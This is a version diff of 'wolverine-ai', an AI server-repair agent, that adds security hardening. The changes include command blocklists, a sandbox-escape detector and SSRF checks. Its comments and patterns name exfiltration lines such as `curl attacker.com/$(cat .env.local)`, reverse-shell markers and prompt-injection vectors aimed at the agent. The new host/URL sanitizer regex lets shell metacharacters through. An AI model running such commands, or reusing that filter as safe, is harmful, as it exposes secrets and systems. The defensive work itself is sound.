wolverine-ai 4.5.0 → 4.5.2

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "wolverine-ai",
-  "version": "4.5.0",
+  "version": "4.5.2",
   "description": "Self-healing Node.js server framework powered by AI. Catches crashes, diagnoses errors, generates fixes, verifies, and restarts — automatically.",
   "main": "src/index.js",
   "bin": {

package/src/agent/agent-engine.js

@@ -477,8 +477,76 @@ const BLOCKED_COMMANDS = [
   /\bnpm\s+publish\b/i,         // no accidental publishes
   /\bcurl\b.*\|\s*bash/i,       // pipe to bash
   /\beval\s*\(/i,
+  /wget.*\|\s*sh/i,             // wget pipe to shell
+  /curl.*\$\(/i,                // curl data exfiltration via command substitution
+  /cat\s+\.env/i,               // read secrets via bash
+  />\s*src\//i,                 // redirect write to src/
+  /cp\s+.*\s+src\//i,          // copy into src/
+  /tee\s+.*src\//i,            // tee into src/
+  /mv\s+.*\s+src\//i,          // move into src/
 ];
 
+/**
+ * Lightweight sandbox escape detector for bash commands.
+ * Catches commands that write, read, or navigate outside the project directory.
+ * Returns a reason string if blocked, null if safe.
+ */
+function _detectSandboxEscape(cmd, cwd) {
+  // Normalize for checking
+  const c = cmd.replace(/\\\n/g, " "); // unwrap line continuations
+
+  // 1. Absolute paths outside project (writes, reads, or cd)
+  //    Allow: npm/node/git system commands that naturally reference /usr, /tmp etc.
+  const absPathMatch = c.match(/(?:>|>>|cp\s|mv\s|rm\s|cat\s|tee\s|mkdir\s|touch\s|chmod\s|chown\s|ln\s)\s*([/\\][^\s;|&>]+)/i);
+  if (absPathMatch) {
+    const target = absPathMatch[1];
+    const cwdNorm = cwd.replace(/\\/g, "/");
+    const targetNorm = target.replace(/\\/g, "/");
+    // Allow /tmp, /dev/null, and paths inside the project
+    if (!targetNorm.startsWith(cwdNorm) && !targetNorm.startsWith("/tmp") && !targetNorm.startsWith("/dev/null")) {
+      return `Command targets path outside project: ${target}`;
+    }
+  }
+
+  // 2. cd to parent directories or absolute paths outside project
+  const cdMatch = c.match(/\bcd\s+([^\s;|&]+)/i);
+  if (cdMatch) {
+    const target = cdMatch[1];
+    if (target === "/" || target === "~" || target.startsWith("/") || target.startsWith("~")) {
+      const resolved = target.replace("~", require("os").homedir()).replace(/\\/g, "/");
+      if (!resolved.startsWith(cwd.replace(/\\/g, "/"))) {
+        return `cd to path outside project: ${target}`;
+      }
+    }
+    // Count .. traversals
+    const parts = target.split("/");
+    let depth = 0;
+    for (const p of parts) { if (p === "..") depth++; else if (p && p !== ".") depth--; }
+    if (depth > 0) {
+      return `cd with path traversal escaping project: ${target}`;
+    }
+  }
+
+  // 3. Backtick/subshell command substitution writing outside project
+  //    e.g., $(cat /etc/passwd > /tmp/leak) or `curl attacker.com/$(cat .env.local)`
+  if (/\$\(.*(?:>|>>)\s*[/\\](?!tmp)/.test(c) || /`.*(?:>|>>)\s*[/\\](?!tmp)/.test(c)) {
+    return "Subshell write to absolute path detected";
+  }
+
+  // 4. Pipe to file outside project
+  //    e.g., echo data | tee /etc/cron.d/malicious
+  if (/\|\s*tee\s+[/\\](?!tmp)/.test(c)) {
+    return "Pipe to tee with absolute path outside /tmp";
+  }
+
+  // 5. Curl/wget uploading local files
+  if (/curl.*-[dF]\s*@/.test(c) || /curl.*--data-binary\s*@/.test(c)) {
+    return "curl uploading local file (potential data exfiltration)";
+  }
+
+  return null; // safe
+}
+
 class AgentEngine {
   constructor(options = {}) {
     this.sandbox = options.sandbox;
@@ -885,7 +953,7 @@ class AgentEngine {
 
         try {
           this.sandbox.resolve(fullPath);
-          const content = fs.readFileSync(fullPath, "utf-8");
+          const content = this.sandbox.readFile(fullPath);
           const lines = content.split("\n");
           const relPath = path.relative(this.cwd, fullPath).replace(/\\/g, "/");
 
@@ -918,17 +986,26 @@ class AgentEngine {
   // ── SHELL TOOLS ──
 
   _bashExec(args) {
-    // Security: check for blocked commands (claw-code: destructiveCommandWarning, bashSecurity)
+    const cmd = args.command || "";
+
+    // Security: check for blocked commands
     for (const blocked of BLOCKED_COMMANDS) {
-      if (blocked.test(args.command)) {
-        console.log(chalk.red(`    🛡️ Blocked dangerous command: ${args.command}`));
-        return { content: `BLOCKED: Command "${args.command}" is not allowed for safety reasons.` };
+      if (blocked.test(cmd)) {
+        console.log(chalk.red(`    🛡️ Blocked dangerous command: ${cmd}`));
+        return { content: `BLOCKED: Command "${cmd}" is not allowed for safety reasons.` };
       }
     }
 
+    // Security: sandbox escape detection — block commands that operate outside project dir
+    const escapeCheck = _detectSandboxEscape(cmd, this.cwd);
+    if (escapeCheck) {
+      console.log(chalk.red(`    🛡️ Blocked sandbox escape: ${escapeCheck}`));
+      return { content: `BLOCKED: ${escapeCheck}` };
+    }
+
     const timeout = Math.min(args.timeout || 30000, 60000);
     try {
-      const output = execSync(args.command, {
+      const output = execSync(cmd, {
         cwd: this.cwd,
         encoding: "utf-8",
         timeout,
@@ -946,7 +1023,7 @@ class AgentEngine {
 
   _gitLog(args) {
     const count = args.count || 10;
-    const fileFilter = args.file ? ` -- ${args.file}` : "";
+    const fileFilter = args.file ? ` -- "${args.file}"` : "";
     try {
       const output = execSync(
         `git log --oneline --no-decorate -n ${count}${fileFilter}`,
@@ -960,8 +1037,8 @@ class AgentEngine {
   }
 
   _gitDiff(args) {
-    const ref = args.ref || "";
-    const fileFilter = args.file ? ` -- ${args.file}` : "";
+    const ref = args.ref ? `"${args.ref}"` : "";
+    const fileFilter = args.file ? ` -- "${args.file}"` : "";
     try {
       const output = execSync(
         `git diff ${ref}${fileFilter}`,
@@ -984,6 +1061,30 @@ class AgentEngine {
         return;
       }
 
+      // SSRF protection: block private/internal IPs
+      try {
+        const parsedUrl = new (require("url").URL)(url);
+        const hostname = parsedUrl.hostname;
+        const privatePatterns = [
+          /^127\./,
+          /^localhost$/i,
+          /^169\.254\.169\.254$/,
+          /^100\.100\.100\.200$/,
+          /^10\./,
+          /^172\.(1[6-9]|2\d|3[01])\./,
+          /^192\.168\./,
+          /^fd[0-9a-f]{2}:/i,
+          /^::1$/,
+        ];
+        if (privatePatterns.some(p => p.test(hostname))) {
+          resolve({ content: `BLOCKED: Cannot fetch private/internal address "${hostname}"` });
+          return;
+        }
+      } catch (e) {
+        resolve({ content: `Error parsing URL: ${e.message}` });
+        return;
+      }
+
       const client = url.startsWith("https") ? https : http;
       const req = client.get(url, { timeout: 10000 }, (res) => {
         let data = "";
@@ -1020,6 +1121,7 @@ class AgentEngine {
   _listDir(args) {
     const dirPath = path.resolve(this.cwd, args.path || ".");
     try {
+      this.sandbox.resolve(dirPath);
       const entries = fs.readdirSync(dirPath, { withFileTypes: true });
       const lines = entries.map(e => {
         try {
@@ -1066,15 +1168,18 @@ class AgentEngine {
 
   _checkEnv(args) {
     const { redact } = require("../security/secret-redactor");
+    const isSecretKey = (k) => /KEY|SECRET|TOKEN|PASSWORD|AUTH|CREDENTIAL/i.test(k);
     if (args.variable) {
       const val = process.env[args.variable];
-      const display = val ? redact(val) : "(not set)";
+      if (!val) return { content: `${args.variable}=(not set)` };
+      const display = isSecretKey(args.variable) ? "SET (redacted)" : redact(val);
       return { content: `${args.variable}=${display}` };
     }
     // List all env vars with redacted values
     const keys = Object.keys(process.env).sort();
     const lines = keys.map(k => {
       const val = process.env[k];
+      if (isSecretKey(k)) return `${k}=${val ? "SET (redacted)" : "(not set)"}`;
       return `${k}=${val && val.length > 50 ? "(set, " + val.length + " chars)" : redact(val || "")}`;
     });
     return { content: lines.join("\n") };
@@ -1101,6 +1206,9 @@ class AgentEngine {
         if (!upper.startsWith("SELECT") && !upper.startsWith("PRAGMA")) {
           return { content: "BLOCKED: inspect_db only allows SELECT/PRAGMA. Use run_db_fix for writes." };
         }
+        if (args.sql.includes(";")) {
+          return { content: "BLOCKED: inspect_db does not allow stacked queries (multiple statements separated by ';')." };
+        }
         const rows = db.prepare(args.sql).all();
         result = JSON.stringify(rows.slice(0, 50), null, 2);
         if (rows.length > 50) result += `\n... (${rows.length} total rows, showing first 50)`;
@@ -1129,7 +1237,9 @@ class AgentEngine {
 
       // Backup the DB file first
       const backupPath = dbPath + ".wolverine-backup";
-      fs.copyFileSync(dbPath, backupPath);
+      if (fs.existsSync(dbPath)) {
+        fs.copyFileSync(dbPath, backupPath);
+      }
 
       const db = new Database(dbPath);
 
@@ -1258,7 +1368,7 @@ class AgentEngine {
   }
 
   _checkLogs(args) {
-    const lines = args.lines || 50;
+    const lines = Math.max(1, Math.min(parseInt(args.lines, 10) || 50, 1000));
     const filter = args.filter || "";
     try {
       let cmd;
@@ -1291,8 +1401,9 @@ class AgentEngine {
       if (args.host) {
         try {
           const dns = require("dns");
-          const addresses = execSync(`node -e "require('dns').resolve('${args.host.replace(/'/g, "")}', (e,a) => console.log(e ? 'FAIL:'+e.code : a.join(',')))"`, { encoding: "utf-8", timeout: 5000 }).trim();
-          results.push(`DNS ${args.host}: ${addresses}`);
+          const safeHost = args.host.replace(/[^a-zA-Z0-9.:\/-_]/g, "");
+          const addresses = execSync(`node -e "require('dns').resolve('${safeHost.replace(/'/g, "")}', (e,a) => console.log(e ? 'FAIL:'+e.code : a.join(',')))"`, { encoding: "utf-8", timeout: 5000 }).trim();
+          results.push(`DNS ${safeHost}: ${addresses}`);
         } catch (e) { results.push(`DNS ${args.host}: FAILED — ${e.message}`); }
       }
       // Port check
@@ -1308,8 +1419,9 @@ class AgentEngine {
       // URL reachability
       if (args.url) {
         try {
-          const urlResult = execSync(`node -e "require('${args.url.startsWith('https') ? 'https' : 'http'}').get('${args.url.replace(/'/g, "")}', r => { console.log(r.statusCode); r.resume(); }).on('error', e => console.log('FAIL:'+e.code))"`, { encoding: "utf-8", timeout: 10000 }).trim();
-          results.push(`URL ${args.url}: ${urlResult}`);
+          const safeUrl = args.url.replace(/[^a-zA-Z0-9.:\/-_]/g, "");
+          const urlResult = execSync(`node -e "require('${safeUrl.startsWith('https') ? 'https' : 'http'}').get('${safeUrl.replace(/'/g, "")}', r => { console.log(r.statusCode); r.resume(); }).on('error', e => console.log('FAIL:'+e.code))"`, { encoding: "utf-8", timeout: 10000 }).trim();
+          results.push(`URL ${safeUrl}: ${urlResult}`);
         } catch (e) { results.push(`URL ${args.url}: FAILED — ${e.message}`); }
       }
       if (results.length === 0) results.push("Provide host, port, or url to check.");
@@ -1358,7 +1470,15 @@ class AgentEngine {
       if (fs.existsSync(binDir)) {
         for (const bin of fs.readdirSync(binDir)) {
           const target = path.join(binDir, bin);
-          try { fs.readlinkSync(target); } catch { brokenBins++; }
+          try {
+            if (process.platform === "win32") {
+              // Windows uses .cmd shims instead of symlinks
+              const cmdFile = target.endsWith(".cmd") ? target : target + ".cmd";
+              if (!fs.existsSync(cmdFile) && !fs.existsSync(target)) brokenBins++;
+            } else {
+              fs.readlinkSync(target);
+            }
+          } catch { brokenBins++; }
         }
       }
       const rec = missing.length > 5 || broken.length > 3 ? "rm -rf node_modules && npm install" : missing.length > 0 ? "npm install" : "ok";
@@ -1475,7 +1595,10 @@ class AgentEngine {
           try { execSync(`rm -rf "${t.path.replace("~", os.homedir())}"`, { timeout: 10000 }); } catch {}
         }
       }
-      const diskFree = Math.round(parseInt(execSync("df -m . | tail -1 | awk '{print $4}'", { encoding: "utf-8", cwd: this.cwd, timeout: 3000 }).trim() || "0", 10));
+      let diskFree;
+      try {
+        diskFree = Math.round(parseInt(execSync("df -m . | tail -1 | awk '{print $4}'", { encoding: "utf-8", cwd: this.cwd, timeout: 3000 }).trim() || "0", 10));
+      } catch { diskFree = "unknown"; }
       const lines = [
         `Disk free: ${diskFree}MB`,
         `Reclaimable: ${reclaimable}MB (${targets.length} targets)`,
@@ -1653,7 +1776,7 @@ class AgentEngine {
 function _simplePrompt(cwd, primaryFile) {
   return `You are Wolverine, a Node.js server repair agent. Fix the error using minimal changes.
 
-TOOLS: read_file, write_file, edit_file, glob_files, grep_code, bash_exec, done
+TOOLS: read_file, write_file, edit_file, glob_files, grep_code, bash_exec, done + 24 more diagnostic tools available
 RULES: Read the file before editing. Use edit_file for targeted fixes. Call done when finished. Use multiple tools at once when independent.
 ${primaryFile ? `File: ${primaryFile}` : ""}
 Project: ${cwd}`;
@@ -1669,7 +1792,7 @@ CRITICAL: Act fast. You have limited turns. Fix immediately when the solution is
 
 For maximum efficiency, invoke multiple independent tools simultaneously rather than sequentially.
 
-TOOLS: read_file, write_file, edit_file, glob_files, grep_code, list_dir, move_file, bash_exec, git_log, git_diff, inspect_db, run_db_fix, check_port, check_env, audit_deps, check_migration, web_fetch, done
+TOOLS: read_file, write_file, edit_file, glob_files, grep_code, list_dir, move_file, bash_exec, git_log, git_diff, inspect_db, run_db_fix, check_port, check_env, audit_deps, check_migration, web_fetch, check_memory, list_processes, check_logs, restart_service, check_network, inspect_env, verify_node_modules, inspect_certificate, inspect_cache, disk_cleanup, check_file_descriptors, check_event_loop, check_websocket, done
 
 FAST FIXES (act immediately, don't investigate):
 - Cannot find module 'X' → bash_exec: npm install X → done

package/src/security/injection-detector.js

@@ -44,6 +44,15 @@ const INJECTION_PATTERNS = [
   // Vault key material leak — CRITICAL: block heal entirely
   { pattern: /0x[0-9a-fA-F]{64}/i, label: "key-leak-critical" },
   { pattern: /master\.key|eth\.vault|\.wolverine\/vault/i, label: "vault-path-leak" },
+  // Bash sandbox escape vectors — error messages crafted to make AI write escaping commands
+  { pattern: /cd\s+\/(?!tmp)\w/i, label: "bash-escape" },
+  { pattern: />\s*\/(?!tmp|dev\/null)\w/i, label: "bash-escape" },
+  { pattern: /curl.*-[dF]\s*@/i, label: "bash-exfil" },
+  { pattern: /wget.*--post-file/i, label: "bash-exfil" },
+  { pattern: /nc\s+-[lp]/i, label: "bash-reverse-shell" },
+  { pattern: /bash\s+-i/i, label: "bash-reverse-shell" },
+  { pattern: /\/dev\/tcp\//i, label: "bash-reverse-shell" },
+  { pattern: /mkfifo|mknod.*\/tmp/i, label: "bash-reverse-shell" },
 ];
 
 /**